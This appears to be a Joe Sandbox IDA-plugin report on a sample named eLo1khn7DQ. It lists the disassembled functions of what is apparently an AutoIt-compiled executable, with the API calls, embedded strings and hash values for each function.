Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j%
API String ID: 2173805711-512576846
Opcode ID: 9f61841f519195ad75190951919543f7f19106ddb0aa15c688c0fb27d4707f4a
Instruction ID: c11cdae6534147ffa5126d80eb00418afb925adba3e905720eec668eb4cb9cb1
Opcode Fuzzy Hash: 9f61841f519195ad75190951919543f7f19106ddb0aa15c688c0fb27d4707f4a
Instruction Fuzzy Hash: B731B571A28209DFCB05AF64E8999BD3776FF44311B600458FD034B6B1C7749925DB94

Function 0027304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0027335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00273077,?,?), ref: 00273378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0027307A
_wcslen.LIBCMT ref: 0027309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00273106

Strings

255.255.255.255, xrefs: 00273095, 0027309A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 0c2c4198accd8f6bc2881843a5ec310239d6da65a53285690acafb327faed011
Instruction ID: 070f20ffb8ce576b60df406af610de379c4dd1b503f7b42a3503c86f5766f7cd
Opcode Fuzzy Hash: 0c2c4198accd8f6bc2881843a5ec310239d6da65a53285690acafb327faed011
Instruction Fuzzy Hash: 3E31E4392102069FCB20DF28C485EAA77E0EF14318F64C099E91D8B392DB72EE55DB60

Function 00284653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00284705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00284713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0028471A

Strings

msctls_updown32, xrefs: 00284684

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 107e9dfcdd695f2320dd413ef5bbcc9a6bdadf8de85c5d6ce8f5526d4dfae89d
Instruction ID: 1a9d30acf9a84a7b5a9a9c62be994c8d02c503783c89b782271df5820cd63cb0
Opcode Fuzzy Hash: 107e9dfcdd695f2320dd413ef5bbcc9a6bdadf8de85c5d6ce8f5526d4dfae89d
Instruction Fuzzy Hash: BB21A4B961121AAFDB10EF64DCC5DB737ADEF5A394B100059FA0097291DB30EC21CB60

Function 002595AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0025961D

Strings

#notrayicon, xrefs: 002595B7
#requireadmin, xrefs: 002595D9
#OnAutoItStartRegister, xrefs: 002595F3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 7ef0d496111e55e81b8be4957e94eae5b5e12dece3e229e6cfeccb2ed1e4a422
Instruction ID: c0630c759cba6872917507bbcc251c0e65dfb27baf6a211ed9ddddfe1847da70
Opcode Fuzzy Hash: 7ef0d496111e55e81b8be4957e94eae5b5e12dece3e229e6cfeccb2ed1e4a422
Instruction Fuzzy Hash: A6213732234212A6D731AE249902FB773DC9FA1311F804025FE4996081EBA09DF9C299

Function 002837B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00283840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00283850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00283876

Strings

Listbox, xrefs: 0028380F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: eaa40558028927dabe4ea95eeb4af17c45aea9140daef33587c59b1a6beddd3b
Instruction ID: 6a04a4aeba2dab4390802263f59b1ccb02023ca5bc9fe0efcc2d54c4e890b080
Opcode Fuzzy Hash: eaa40558028927dabe4ea95eeb4af17c45aea9140daef33587c59b1a6beddd3b
Instruction Fuzzy Hash: 2521AF76621119BBEB11DF54DC45EAB776EEF89B50F108124F9049B190CA71DC628BA0

Function 002649F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00264A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00264A5C
SetErrorMode.KERNEL32(00000000,?,?,0028CC08), ref: 00264AD0

Strings

%lu, xrefs: 00264A6F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 563d150f52c0155e1313f3227d8bb55d885957a482f627c447b7cea683c172b8
Instruction ID: 4400b1f9d28eecc6f02b8e178eed81fdf237e6dc572591b032c210ded9cbb3b5
Opcode Fuzzy Hash: 563d150f52c0155e1313f3227d8bb55d885957a482f627c447b7cea683c172b8
Instruction Fuzzy Hash: 8C317175A00209AFDB10EF54C885EAA7BF8EF08308F1480A5F909DB252D771EE55CBA1

Function 002841EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0028424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00284264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00284271

Strings

msctls_trackbar32, xrefs: 00284226

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d2a51cc6d50e1f74bd0009126828c63fd5a38b7b786dbf37e48b4186e27c8ba5
Instruction ID: 8aa0c502f5a5a680f259d9e27e452152e36d42edeea3fb803e874b962b126211
Opcode Fuzzy Hash: d2a51cc6d50e1f74bd0009126828c63fd5a38b7b786dbf37e48b4186e27c8ba5
Instruction Fuzzy Hash: EA11E335264209BFEF20AF28CC06FAB3BACEF95B54F110124FA55E20D0D671D8219B20

Function 00252F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

Part of subcall function 00252DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00252DC5
Part of subcall function 00252DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00252DD6
Part of subcall function 00252DA7: GetCurrentThreadId.KERNEL32 ref: 00252DDD
Part of subcall function 00252DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00252DE4

GetFocus.USER32 ref: 00252F78

Part of subcall function 00252DEE: GetParent.USER32(00000000), ref: 00252DF9

GetClassNameW.USER32(?,?,00000100), ref: 00252FC3
EnumChildWindows.USER32(?,0025303B), ref: 00252FEB

Strings

%s%d, xrefs: 00252FFF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 53449b8b00de390563c00735c588dcb5a2e0792dbcd4a22e8fc9999f2bfdbd19
Instruction ID: d1722c40d59b818a2bef9707ad8044de683257f51a028dadd23b90f60a2aea9b
Opcode Fuzzy Hash: 53449b8b00de390563c00735c588dcb5a2e0792dbcd4a22e8fc9999f2bfdbd19
Instruction Fuzzy Hash: D011CD75210219ABCF50BF609C89EEE376AAF95305F044075BD099B292DF30991D8F70

Function 00285882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002858C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002858EE
DrawMenuBar.USER32(?), ref: 002858FD

Strings

0, xrefs: 0028588F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 55f764c479cc032b89edad9f40b513772f5612c10b48a9d81d91c5fe9e2ed511
Instruction ID: 8b66d11567865d7cc6a0b99fbb4a8495854007a3a5a5b27506cab858f427d23d
Opcode Fuzzy Hash: 55f764c479cc032b89edad9f40b513772f5612c10b48a9d81d91c5fe9e2ed511
Instruction Fuzzy Hash: 7A01C435521218EFDF20AF11EC44BAEBBB4FF45361F108099E848D6191DB308AA0DF70

Function 0025007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cc62aab187ccc760dd1b2e259d901df3a07fe99c53b231e782b7ac870b2321
Instruction ID: 2e8f4d09dbf93c18838a1157718557fb1a01c199b83d865af6bc5a6cee04a857
Opcode Fuzzy Hash: 35cc62aab187ccc760dd1b2e259d901df3a07fe99c53b231e782b7ac870b2321
Instruction Fuzzy Hash: A5C17B75A1020AEFDB14CFA4C898BAEB7B5FF48305F208598E805EB251C771ED95CB94

Function 0027342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00273459
CoUninitialize.OLE32 ref: 00273463
VariantInit.OLEAUT32(?), ref: 0027346E
VariantClear.OLEAUT32(?), ref: 0027371B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: ea1a0f5ed222ee537b8333a81a967904935bb6b75ab51fc0b09830f484890e19
Instruction ID: 444e0a00b4aa0bfe2271b7c927bfac179f8e39b692911394ccad67042e8c10fb
Opcode Fuzzy Hash: ea1a0f5ed222ee537b8333a81a967904935bb6b75ab51fc0b09830f484890e19
Instruction Fuzzy Hash: C4A169752143059FC700EF28C485A2AB7E5FF88714F048859F98A9B3A2DB70EE15DF92

Function 00250436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0028FC08,?), ref: 002505F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0028FC08,?), ref: 00250608
CLSIDFromProgID.OLE32(?,?,00000000,0028CC40,000000FF,?,00000000,00000800,00000000,?,0028FC08,?), ref: 0025062D
_memcmp.LIBVCRUNTIME ref: 0025064E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 71f42cb2e74d4a3ddce9cef79926086fb814464ed94a26dbdfcbfad21a1c8e3e
Instruction ID: e1bcddbaeadd671227e203122d2586822b61310b297a1847a1c54147b48f7657
Opcode Fuzzy Hash: 71f42cb2e74d4a3ddce9cef79926086fb814464ed94a26dbdfcbfad21a1c8e3e
Instruction Fuzzy Hash: FC814C75A10109EFCB04DF94C984EEEB7B9FF89315F204558E916AB250DB71AE0ACB60

Function 00231391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002314C0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: be5ba64a88bfa06067108221aea1c9ac497c577d82adaf4d21e091e6a46e9863
Instruction ID: ec4aa15614a36695e1a7e83030e1fbb4e97edc23a438068374f20d8efb61cda7
Opcode Fuzzy Hash: be5ba64a88bfa06067108221aea1c9ac497c577d82adaf4d21e091e6a46e9863
Instruction Fuzzy Hash: 32417DB1A30111BBDB217FFC9C466FE3AE5EF51330F244225F919C2191E67448B15B61

Function 00286278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00CDE760,?), ref: 002862E2
ScreenToClient.USER32(?,?), ref: 00286315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00286382

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4ce37d939ac6ca223c4308654a19612e632e35c577af1e3e7ccc8112dba0d559
Instruction ID: f71d68967aaca0f1a0c2a2bfc41ac83efd1b2383be4167d8e7185729421623a8
Opcode Fuzzy Hash: 4ce37d939ac6ca223c4308654a19612e632e35c577af1e3e7ccc8112dba0d559
Instruction Fuzzy Hash: A4517D7891120AEFCF10EF58D888AAE7BB5FF45760F2081A9F9159B290D730ED61CB50

Function 00271AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00271AFD
WSAGetLastError.WSOCK32 ref: 00271B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00271B8A
WSAGetLastError.WSOCK32 ref: 00271B94

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: fa6ce79029995a58e968e0cde2ecec4376ed495a3fc8adc7b27a9c24bb8484e8
Instruction ID: 60045c98f7200b3b13263e813e547aa2c342a4c9f4b1a02f9d60ae8433d84263
Opcode Fuzzy Hash: fa6ce79029995a58e968e0cde2ecec4376ed495a3fc8adc7b27a9c24bb8484e8
Instruction Fuzzy Hash: E7419E74600201AFE720AF24D886F3A77E5AF44718F54C448FA1A9F2D3D772ED528B90

Function 0022B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9771bebaa6fb32d9e8569eb1b5a7dbe09218d74cee535500d65966fb14b3ac89
Instruction ID: 14f82f066e51449be00ab75fc23da8e361cf51510ba4ad98efcca34124361f62
Opcode Fuzzy Hash: 9771bebaa6fb32d9e8569eb1b5a7dbe09218d74cee535500d65966fb14b3ac89
Instruction Fuzzy Hash: D6414B71A20714BFD725AFB8DC41BAABBE9EB88710F10452AF451DB281D7729960CB80

Function 002656D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00265783
GetLastError.KERNEL32(?,00000000), ref: 002657A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002657CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002657FA

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 217473d27db7ca54e852ac8d2360a804dc20cae004dae1bdffa09029878e5c97
Instruction ID: 363b4c7e35fa1ecb1dfaf18a5a05381c69aedfbe09b8bf73372f1de38f610b2c
Opcode Fuzzy Hash: 217473d27db7ca54e852ac8d2360a804dc20cae004dae1bdffa09029878e5c97
Instruction Fuzzy Hash: DA413D39600615DFCB11DF15D544A2EBBE2EF99320B198488ED4AAB3A2CB74FD44CB91

Function 0022D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00216D71,00000000,00000000,002182D9,?,002182D9,?,00000001,00216D71,?,00000001,002182D9,002182D9), ref: 0022D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0022D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0022D9AB
__freea.LIBCMT ref: 0022D9B4

Part of subcall function 00223820: RtlAllocateHeap.NTDLL(00000000,?,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6,?,001F1129), ref: 00223852

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8d452ed55b623efce6419ddddd6b1f851d2c4e25cb3cd3b44a36740144c905f8
Instruction ID: e38241f6f5f000d8d1126ef044e1ee8e4ee66f67776492541efb07f9c4106681
Opcode Fuzzy Hash: 8d452ed55b623efce6419ddddd6b1f851d2c4e25cb3cd3b44a36740144c905f8
Instruction Fuzzy Hash: 9831B371A2021AABDF24DFA4EC85EEE7BA5EB40310F154168FC04D7250D735CDA4CB90

Function 002852C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00285352
GetWindowLongW.USER32(?,000000F0), ref: 00285375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00285382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002853A8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

